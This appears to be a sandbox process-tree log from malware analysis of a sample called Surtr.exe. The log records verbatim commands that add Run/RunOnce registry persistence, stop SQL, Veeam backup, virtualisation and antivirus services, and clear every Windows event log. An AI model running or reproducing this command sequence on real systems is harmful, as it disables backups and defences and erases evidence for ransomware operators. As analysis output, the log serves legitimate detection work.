    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1476
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
    3⤵
    PID:1812
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPSAMA"
      4⤵
      PID:1012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
        5⤵
        
        PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1656
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:1172
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:1076
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:240
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:968
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:576
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:1768
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
        5⤵
        
        PID:236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
    3⤵
    PID:388
  - - C:\Windows\system32\net.exe
      net stop "SQLBrowser"
      4⤵
      PID:796
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBrowser"
        5⤵
        
        PID:1516
  - - C:\Windows\system32\net.exe
      net stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:1832
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
        5⤵
        
        PID:204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
    3⤵
    PID:1624
  - - C:\Windows\system32\net.exe
      net stop "SQLSafeOLRService"
      4⤵
      PID:204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSafeOLRService"
        5⤵
        
        PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
    3⤵
    PID:1648
  - - C:\Windows\system32\net.exe
      net stop "SQLSERVERAGENT"
      4⤵
      PID:1208
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        5⤵
        
        PID:1796
  - - C:\Windows\system32\net.exe
      net stop "VeeamNFSSvc"
      4⤵
      PID:524
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamNFSSvc"
        5⤵
        
        PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
    3⤵
    PID:1180
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY"
      4⤵
      PID:1920
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY"
        5⤵
        
        PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:208
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
        5⤵
        
        PID:864
  - - C:\Windows\system32\net.exe
      net stop "VeeamTransportSvc"
      4⤵
      PID:396
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamTransportSvc"
        5⤵
        
        PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
    3⤵
    PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
    3⤵
    PID:824
  - - C:\Windows\system32\net.exe
      net stop "SstpSvc"
      4⤵
      PID:564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SstpSvc"
        5⤵
        
        PID:812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
    3⤵
    PID:1476
  - - C:\Windows\system32\net.exe
      net stop "svcGenericHost"
      4⤵
      PID:1200
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "svcGenericHost"
        5⤵
        
        PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "tmlisten"
    3⤵
    PID:1012
  - - C:\Windows\system32\net.exe
      net stop "tmlisten"
      4⤵
      PID:1656
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "tmlisten"
        5⤵
        
        PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "TrueKey"
    3⤵
    PID:336
  - - C:\Windows\system32\net.exe
      net stop "TrueKey"
      4⤵
      PID:1488
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "TrueKey"
        5⤵
        
        PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
    3⤵
    PID:688
  - - C:\Windows\system32\net.exe
      net stop "UI0Detect"
      4⤵
      PID:1556
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "UI0Detect"
        5⤵
        
        PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
    3⤵
    PID:1220
  - - C:\Windows\system32\net.exe
      net stop "VeeamBackupSvc"
      4⤵
      PID:1168
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBackupSvc"
        5⤵
        
        PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
    3⤵
    PID:1356
  - - C:\Windows\system32\net.exe
      net stop "VeeamBrokerSvc"
      4⤵
      PID:620
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBrokerSvc"
        5⤵
        
        PID:232
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CXDB"
      4⤵
      PID:1204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CXDB"
        5⤵
        
        PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
    3⤵
    PID:1116
  - - C:\Windows\system32\net.exe
      net stop "VeeamCatalogSvc"
      4⤵
      PID:220
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCatalogSvc"
        5⤵
        
        PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
    3⤵
    PID:612
  - - C:\Windows\system32\net.exe
      net stop "VeeamCloudSvc"
      4⤵
      PID:892
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCloudSvc"
        5⤵
        
        PID:2036
  - - C:\Windows\system32\net.exe
      net stop "SQL Backups"
      4⤵
      PID:1768
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQL Backups"
        5⤵
        
        PID:320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
    3⤵
    PID:1132
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploymentService"
      4⤵
      PID:320
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploymentService"
        5⤵
        
        PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
    3⤵
    PID:576
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploySvc"
      4⤵
      PID:1516
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploySvc"
        5⤵
        
        PID:796
  - - C:\Windows\system32\net.exe
      net stop "Zoolz 2 Service"
      4⤵
      PID:1192
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Zoolz 2 Service"
        5⤵
        
        PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
    3⤵
    PID:1624
  - - C:\Windows\system32\net.exe
      net stop "VeeamMountSvc"
      4⤵
      PID:1796
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamMountSvc"
        5⤵
        
        PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
    3⤵
    PID:1648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
    3⤵
    PID:1180
  - - C:\Windows\system32\net.exe
      net stop "VeeamRESTSvc"
      4⤵
      PID:864
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamRESTSvc"
        5⤵
        
        PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
    3⤵
    PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "W3Svc"
    3⤵
    PID:528
  - - C:\Windows\system32\net.exe
      net stop "W3Svc"
      4⤵
      PID:812
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "W3Svc"
        5⤵
        
        PID:564
  - - C:\Windows\system32\net.exe
      net stop "ekrn"
      4⤵
      PID:1628
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ekrn"
        5⤵
        
        PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:824
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:1804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:1200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WRSVC"
    3⤵
    PID:1476
  - - C:\Windows\system32\net.exe
      net stop "WRSVC"
      4⤵
      PID:1812
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WRSVC"
        5⤵
        
        PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:1012
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:1148
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:336
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:1164
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
    3⤵
    PID:688
  - - C:\Windows\system32\net.exe
      net stop "VeeamHvIntegrationSvc"
      4⤵
      PID:1988
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
        5⤵
        
        PID:1168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "swi_update"
    3⤵
    PID:1220
  - - C:\Windows\system32\net.exe
      net stop "swi_update"
      4⤵
      PID:232
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "swi_update"
        5⤵
        
        PID:620
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:224
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
        5⤵
        
        PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
    3⤵
    PID:1356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
    3⤵
    PID:1116
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:2036
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
        5⤵
        
        PID:892
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:320
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
    3⤵
    PID:612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
    3⤵
    PID:1132
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROD"
      4⤵
      PID:796
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROD"
        5⤵
        
        PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
    3⤵
    PID:576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
    3⤵
    PID:388
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper"
      4⤵
      PID:1208
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper"
        5⤵
        
        PID:1796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
    3⤵
    PID:1624
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROD"
      4⤵
      PID:1920
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROD"
        5⤵
        
        PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
    3⤵
    PID:1648
  - - C:\Windows\system32\net.exe
      net stop "msftesql$PROD"
      4⤵
      PID:764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "msftesql$PROD"
        5⤵
        
        PID:864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
    3⤵
    PID:1180
  - - C:\Windows\system32\net.exe
      net stop "NetMsmqActivator"
      4⤵
      PID:288
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetMsmqActivator"
        5⤵
        
        PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
    3⤵
    PID:208
  - - C:\Windows\system32\net.exe
      net stop "EhttpSrv"
      4⤵
      PID:564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EhttpSrv"
        5⤵
        
        PID:812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ekrn"
    3⤵
    PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
    3⤵
    PID:824
  - - C:\Windows\system32\net.exe
      net stop "ESHASRV"
      4⤵
      PID:1656
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ESHASRV"
        5⤵
        
        PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
    3⤵
    PID:1476
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SOPHOS"
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
        5⤵
        
        PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
    3⤵
    PID:1012
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SOPHOS"
      4⤵
      PID:1556
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
        5⤵
        
        PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AVP"
    3⤵
    PID:336
  - - C:\Windows\system32\net.exe
      net stop "AVP"
      4⤵
      PID:952
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AVP"
        5⤵
        
        PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "klnagent"
    3⤵
    PID:688
  - - C:\Windows\system32\net.exe
      net stop "klnagent"
      4⤵
      PID:620
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "klnagent"
        5⤵
        
        PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:1356
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:892
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
        5⤵
        
        PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "HvHost"
    3⤵
    PID:612
  - - C:\Windows\system32\net.exe
      net stop "HvHost"
      4⤵
      PID:1516
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "HvHost"
        5⤵
        
        PID:796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
    3⤵
    PID:1132
  - - C:\Windows\system32\net.exe
      net stop "vmickvpexchange"
      4⤵
      PID:1832
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmickvpexchange"
        5⤵
        
        PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
    3⤵
    PID:576
  - - C:\Windows\system32\net.exe
      net stop "vmicguestinterface"
      4⤵
      PID:1796
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicguestinterface"
        5⤵
        
        PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
    3⤵
    PID:388
  - - C:\Windows\system32\net.exe
      net stop "vmicshutdown"
      4⤵
      PID:1112
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicshutdown"
        5⤵
        
        PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
    3⤵
    PID:1624
  - - C:\Windows\system32\net.exe
      net stop "vmicheartbeat"
      4⤵
      PID:864
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicheartbeat"
        5⤵
        
        PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmcompute"
    3⤵
    PID:1648
  - - C:\Windows\system32\net.exe
      net stop "vmcompute"
      4⤵
      PID:1704
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmcompute"
        5⤵
        
        PID:288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
    3⤵
    PID:1180
  - - C:\Windows\system32\net.exe
      net stop "vmicvmsession"
      4⤵
      PID:812
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvmsession"
        5⤵
        
        PID:564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
    3⤵
    PID:208
  - - C:\Windows\system32\net.exe
      net stop "vmicrdv"
      4⤵
      PID:1804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicrdv"
        5⤵
        
        PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
    3⤵
    PID:528
  - - C:\Windows\system32\net.exe
      net stop "vmictimesync"
      4⤵
      PID:1812
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmictimesync"
        5⤵
        
        PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvss"
    3⤵
    PID:824
  - - C:\Windows\system32\net.exe
      net stop "vmicvss"
      4⤵
      PID:1488
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvss"
        5⤵
        
        PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
    3⤵
    PID:1476
  - - C:\Windows\system32\net.exe
      net stop "VMAuthdService"
      4⤵
      PID:1164
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMAuthdService"
        5⤵
        
        PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
    3⤵
    PID:1012
  - - C:\Windows\system32\net.exe
      net stop "VMnetDHCP"
      4⤵
      PID:1168
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMnetDHCP"
        5⤵
        
        PID:952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
    3⤵
    PID:336
  - - C:\Windows\system32\net.exe
      net stop "VMware NAT Service"
      4⤵
      PID:232
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        5⤵
        
        PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
    3⤵
    PID:688
  - - C:\Windows\system32\net.exe
      net stop "VMUSBArbService"
      4⤵
      PID:1204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMUSBArbService"
        5⤵
        
        PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
    3⤵
    PID:1220
  - - C:\Windows\system32\net.exe
      net stop "VMwareHostd"
      4⤵
      PID:2036
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMwareHostd"
        5⤵
        
        PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sense"
    3⤵
    PID:1356
  - - C:\Windows\system32\net.exe
      net stop "Sense"
      4⤵
      PID:236
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sense"
        5⤵
        
        PID:320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
    3⤵
    PID:1116
  - - C:\Windows\system32\net.exe
      net stop "WdNisSvc"
      4⤵
      PID:796
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WdNisSvc"
        5⤵
        
        PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WinDefend"
    3⤵
    PID:612
  - - C:\Windows\system32\net.exe
      net stop "WinDefend"
      4⤵
      PID:204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        5⤵
        
        PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
    3⤵
    PID:528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe el
      4⤵
      PID:240
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1076
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:968
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Application"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DebugChannel"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:620
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DirectShowFilterGraph"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:336
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DirectShowPluginControl"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Els_Hyphenation/Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:892
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "EndpointMapper"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:1220
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "ForwardedEvents"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:236
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "HardwareEvents"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1516
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Internet Explorer"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1116
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Key Management Service"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:204
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1688
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Media Center"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1692
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationDeviceProxy"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPerformance"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1060
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPipeline"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:912
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPlatform"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2024
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IE/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1764
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:920
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1928
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
      4⤵
      PID:1292
